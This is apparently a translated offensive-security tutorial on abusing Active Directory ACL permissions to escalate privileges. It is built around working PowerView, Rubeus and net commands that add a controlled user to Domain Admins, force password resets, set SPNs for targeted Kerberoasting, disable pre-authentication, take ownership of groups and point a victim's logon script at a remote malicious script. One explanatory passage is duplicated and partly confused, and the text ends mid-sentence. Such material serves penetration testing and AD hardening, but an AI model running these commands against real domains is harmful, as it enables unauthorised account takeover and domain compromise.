Title: How to use the intranet activity directory

Abuse of active directory ACLs\ACEs permissions

https://book.hacktricks.xyz/windows-hardening/active-directory-methodology/acl-persistence-abuse

https://www.cnblogs.com/nice0e3/p/15879624.html

DACL and ACE are concepts related to access control and are commonly used in operating systems and network environments. Here is a detailed explanation of them:

DACL (Discretionary Access Control List): DACL is an access control list used to determine who can access specific objects (such as files, folders, registry keys, etc.). DACL is a list of access control entries (ACE). ACE (Access Control Entry): ACE is the basic unit in DACL, used to grant or deny access to objects. Each ACE defines a security principal (such as a user, group, computer, etc.) and the permissions that the security principal has. In a DACL, each ACE contains the following information:

Security principal (SID): A unique identifier that identifies a user, group, or computer whose access is authorized or denied. Access permissions: Indicates specific operations or permissions (such as reading, writing, execution, etc.). Access Mask: Specifies the permissions that are actually granted or denied. Auxiliary access mask: In some cases, used to specify other conditions or restrictions. When accessing an object, the system will verify based on the ACE in the DACL. Access will be allowed if there is an ACE that matches the user identity and the ACE grants the requested permission. If there is no matching ACE, or there is an ACE that matches the user identity, but the ACE denies the requested permission, access will be denied.

The ACE of the domain administrator is as follows

Among them, the permissions we are concerned about are as follows

GenericAll- full rights to the object (add users to a group or reset user's password)GenericWrite- update object's attributes (i.e logon script)WriteOwner- change object owner to attacker controlled user take over the objectWriteDACL- modify object's ACEs and give attacker full control right over the objectAllExtendedRights- ability to add user to a group or reset passwordForceChangePassword- ability to change user's passwordSelf (Self-Membership)- ability to add yourself to a groupGenericAll - Have full permissions to the object (such as adding a user to a group or resetting a user's password). GenericWrite - Updates the properties of the object (such as login scripts). WriteOwner - Modify the owner of the object to be a user controlled by the attacker and take over the object. WriteDACL - Modify the ACEs of the object and grant the attacker all control over the object. AllExtendedRights - Ability to add users to groups or reset passwords. ForceChangePassword - Ability to change the user's password. Self (Self-Membership) - Ability to add yourself to a group. Self-Membership - This permission refers to the permission that an account can add itself to a group (the need to add ACE to the advanced permissions of a certain group, that is, it is for group objects), that is, an object is the Self-Membership identity in a certain group.

GenericAll

GenericAll permissions to user accounts

Use the PowerView tool to view the user's GenericAll permissions.

powershell -exec bypass

Import-Module .\PowerView.ps1

//Get the access control list (ACL) of the AD object of user man1, filter and return the item with 'GenericAll' permission

Get-ObjectAcl -SamAccountName man1 -ResolveGUIDs | ? {$_.ActiveDirectoryRights -eq 'GenericAll'}

You can see that the spotless user has GenericAll permissions to delegate, so if the spotless user permissions have been obtained, we can take over the delegate user.

**Change password: **Change password directly to modify the delegate user. net user usernamepassword /domain

**Kerberoasting attack: **Set SPN for the delegate user, and then request all service STs through the spotless user's TGT, obtain the HASH encrypted STs of the delegate user, and crack it. # Set SPN

Set-DomainObject -Credential $creds -Identity username -Set @{serviceprincipalname='fake/NOTHING'}

# Get Hash

.\Rubeus.exe kerberost /user:username /nowrap

# Clean SPN

Set-DomainObject -Credential $creds -Identity username -Clear serviceprincipalname -Verbose

https://github.com/ShutdownRepo/targetedKerberoast

python3 targetedKerberost.py -domain.local -u username -p password -v

**ASREProast Attack: **You can make a user ASREPRoastable by disabling pre-authentication and then perform an ASREProast attack on it. Set-DomainObject -Identity username -XOR @{UserAccountControl=4194304}

GenericAll permissions to user groups

//Get the distinguishedName value of the domain admins group

Get-NetGroup 'domain admins'

//Get the ACL of the Domain Admins group

Get-ObjectAcl -ResolveGUIDs | ? {$_.objectdn -eq ' CN=Domain Admins,CN=Users,DC=vvvv1,DC=com'}

It was found that the spotless user has GenericAll permissions to the Domain Admins group and can attack.

Add yourself (user spotless) or other users to the Domain Admin group.

net group 'domain admins' spotless /add /domain

You can also use Active Directory or PowerSploit modules for attack.

# with active directory module

Add-ADGroupMember -Identity 'domain admins' -Members spotless

# with Powersploit

Add-NetGroupUser -UserName spotless -GroupName 'domain admins' -Domain 'offense.local'

GenericAll permissions to machine or service accounts

If you have GenericAll permissions or GenericWrite permissions on a machine account or service account, you can consider using resource-based constraint delegation attacks. For details, see 《内网横向移动-基于资源的约束委派》; for service accounts, you can also consider the attack methods on user accounts above; or use Shadow Credentials to attack; shadow credentials https://book.hacktricks.xyz/window-hardening/active-directory-methodology/acl-persistence-abuse/shadow-credentials

https://posts.specterops.io/shadow-credentials-abusing-key-trust-account-mapping-for-takeover-8ee1a53566ab

http://www.hackdig.com/02/hack-599160.htm

https://shenaniganslabs.io/2019/01/28/Wagging-the-Dog.html

WriteProperty

WriteProperty permissions to user groups

Our controlled users have WriteProperty permissions to the domain admins group.

This user can be added to the domain admins group to increase permissions.

powershell -exec bypass

Import-Module .\PowerView.ps1

Add-NetGroupUser -UserName user -GroupName 'domain admins' -Domain 'vvvv1.com'

Self (Self-Membership)

Self (Self-Membership) permissions to user groups

Our controlled users have Self (Self-Membership) permissions to the domain admins group.

This permission can also add the user to the group permission, and add the user to the domain admins group to increase permissions.

powershell -exec bypass

Import-Module .\PowerView.ps1

Add-NetGroupUser -UserName user -GroupName 'domain admins' -Domain 'vvvv1.com'

'WriteProperty (Self-Membership)' and 'Self (Self-Membership)' are both attributes related to self-membership, but they differ in meaning.

'WriteProperty (Self-Membership)': This property indicates that the object can write (modify) its own properties. Generally speaking, an object can only modify the properties of other objects, but cannot directly modify its own properties. But when the 'WriteProperty (Self-Membership)' property is set, the object can modify its own properties. 'Self (Self-Membership)': This property indicates that the object itself is a member of the group or collection it is located in. It is different from the 'WriteProperty (Self-Membership)' property. The 'Self (Self-Membership)' property indicates that the object itself is a member of its group or collection, while the 'WriteProperty (Self-Membership)' property indicates that the object has permission to modify its own properties. Summary: That is to say, if the object type is not ALL, but Self-Membership, then it means that the user object we are querying belongs to this user group. The 'WriteProperty (Self-Membership)' attribute gives the object permission to modify its own attributes, so that the object can be added to the group; and the 'Self (Self-Membership)' attribute indicates that the object itself is a member of the group or collection it is located, and the object can also be added to the group.

WriteProperty (Self-Membership)

WriteProperty (Self-Membership) permissions to user groups

Our controlled users have WriteProperty (Self-Membership) permissions to the domain admins group.

Get-ObjectAcl -ResolveGUIDs | ? {$_.objectdn -eq 'CN=Domain Admins,CN=Users,DC=offense,DC=local' -and $_.IdentityReference -eq 'OFFENSE\spotless'}

This permission can also add the user to the group permission, and add the user to the domain admins group to increase permissions.

net group 'domain admins' spotless /add /domain

'WriteProperty (Self-Membership)' and 'Self (Self-Membership)' are both attributes related to self-membership, but they differ in meaning.

'WriteProperty (Self-Membership)': This property indicates that the object can write (modify) its own properties. Generally speaking, an object can only modify the properties of other objects, but cannot directly modify its own properties. But when the 'WriteProperty (Self-Membership)' property is set, the object can modify its own properties. 'Self (Self-Membership)': This property indicates that the object itself is a member of the group or collection it is located in. It is different from the 'WriteProperty (Self-Membership)' property. The 'Self (Self-Membership)' property indicates that the object itself is a member of its group or collection, while the 'WriteProperty (Self-Membership)' property indicates that the object has permission to modify its own properties. Summary: That is to say, if the object type is not ALL, but Self-Membership, then it means that the user object we are querying belongs to this user group. The 'WriteProperty (Self-Membership)' attribute gives the object permission to modify its own attributes, so that the object can be added to the group; and the 'Self (Self-Membership)' attribute indicates that the object itself is a member of the group or collection it is located, and the object can also be added to the group.

ForceChangePassword

ForceChangePassword permissions to user accounts

If our controlled account is of the 'User-Force-Change-Password' object type in the ACL of the target account and has the 'ExtendedRight' permission, then we can reset the user's password without knowing the user's current password.

powershell -exec bypass

Import-Module .\PowerView.ps1

Get-ObjectAcl -SamAccountName delegate -ResolveGUIDs | ? {$_.IdentityReference -eq 'OFFENSE\spotless'}

Use the tool PowerView to modify the password.

Set-DomainUserPassword -Identity delegate -Verbose

Or use the following statement

$c=Get-Credential

Set-DomainUserPassword -Identity delegate -AccountPassword $c.Password -Verbose

Or summarized into single line sentences

Set-DomainUserPassword -Identity delegate -AccountPassword (ConvertTo-SecureString '123456' -AsPlainText -Force) -Verbose

WriteOwner

WriteOwner permissions to user groups

Before the attack was carried out, the owner of Domain Admins was Domain Admins.

After enumerating the ACEs of a certain group, if we find that a user under our control spotless has the 'WriteOwner' permission and that permission applies to 'ObjectType:All', then the owner of the group can be modified.

Get-ObjectAcl -ResolveGUIDs | ? {$_.objectdn -eq 'CN=Domain Admins,CN=Users,DC=offense,DC=local' -and $_.IdentityReference -eq 'OFFENSE\spotless'}

We can change the owner of the 'Domain Admins' object to our user, which in our case is 'spotless'. It should be noted that the SID specified with '-Identity' is the SID of the 'Domain Admins' group.

Set-DomainObjectOwner -Identity S-1-5-21-2552734371-813931464-1050690807-512 -OwnerIdentity 'spotless' -Verbose

//You can also use the name instad of the SID (HTB: Reel)

Set-DomainObjectOwner -Identity 'Domain Admins' -OwnerIdentity 'spotless'

GenericWrite

GenericWrite is also identified in Access Mask. This permission can update the property value of the target object. You can use the Set-DomainObject method in PowerView to set the value of the target property.

GenericWrite permissions to user accounts

Get-ObjectAcl -ResolveGUIDs -SamAccountName delegate | ? {$_.IdentityReference -eq 'OFFENSE\spotless'}

The controlled user spotless has the 'WriteProperty' permission to another user delegate, and this permission applies to the 'Script-Path' object type. It allows attackers to overwrite the delegate user's login script path, which means that the next time the delegate user logs in, their system will execute our malicious script.

Set-ADObject -SamAccountName delegate -PropertyName scriptpath -PropertyValue '\\10.0.0.5\totallyLegitScript.ps1'

You can see that the login script field of the delegate user is updated in AD.

GenericWrite permissions to user groups

Allows you to add new users (such as yourself) as members of the group. Similar to the 《GenericAll-对用户组的GenericAll权限》 operation above.

https://book.hacktricks.xyz/windows-hardening/active-directory-methodology/acl-persistence-abuse

# Create creds

$pwd=ConvertTo-SecureString 'JustAWeirdPwd!$' -AsPlainText -Force

$creds=New-Object System.Management.Automation.PSCredential('DOMAIN\username', $pwd)

# Add user to group

Add-DomainGroupMember -Credential $creds -Identity 'Group Name' -Members 'username' -Verbose

# Check user was